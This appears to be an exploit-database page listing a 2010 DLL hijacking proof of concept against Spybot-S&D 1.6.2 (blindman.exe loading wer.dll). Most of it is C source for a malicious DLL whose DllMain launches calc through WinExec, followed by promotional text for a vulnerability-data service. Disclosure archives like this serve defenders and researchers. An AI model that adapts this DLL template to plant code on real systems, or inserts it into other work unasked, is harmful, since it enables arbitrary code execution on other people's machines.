Lucene search
K

Spybot-S&D blindman.exe DLL Hijacking (wer.dll)

🗓️ 31 Aug 2010 00:00:00Reported by kB0]1_Type 
zdt
 zdt
🔗 0day.today👁 20 Views

Spybot-S&D blindman.exe DLL Hijacking (wer.dll) dated August 30, 2010, software version 1.6.2, vulnerable with extension .disabled on XP Pro SP2, exploiting WinExec to launch cal

Code
===============================================
Spybot-S&D blindman.exe DLL Hijacking (wer.dll)
===============================================

/*
 Spybot-S&D blindman.exe DLL Hijacking (wer.dll)
 Date: August 30, 2010
 Author: kB0]1_
 Software : http://www.safer-networking.org/en/faq/25.html
 Version: 1.6.2
 Vulnerable Extension : .disabled
 Tested on: XP Pro SP2
*/

#include <windows.h>
 
int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}



#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
20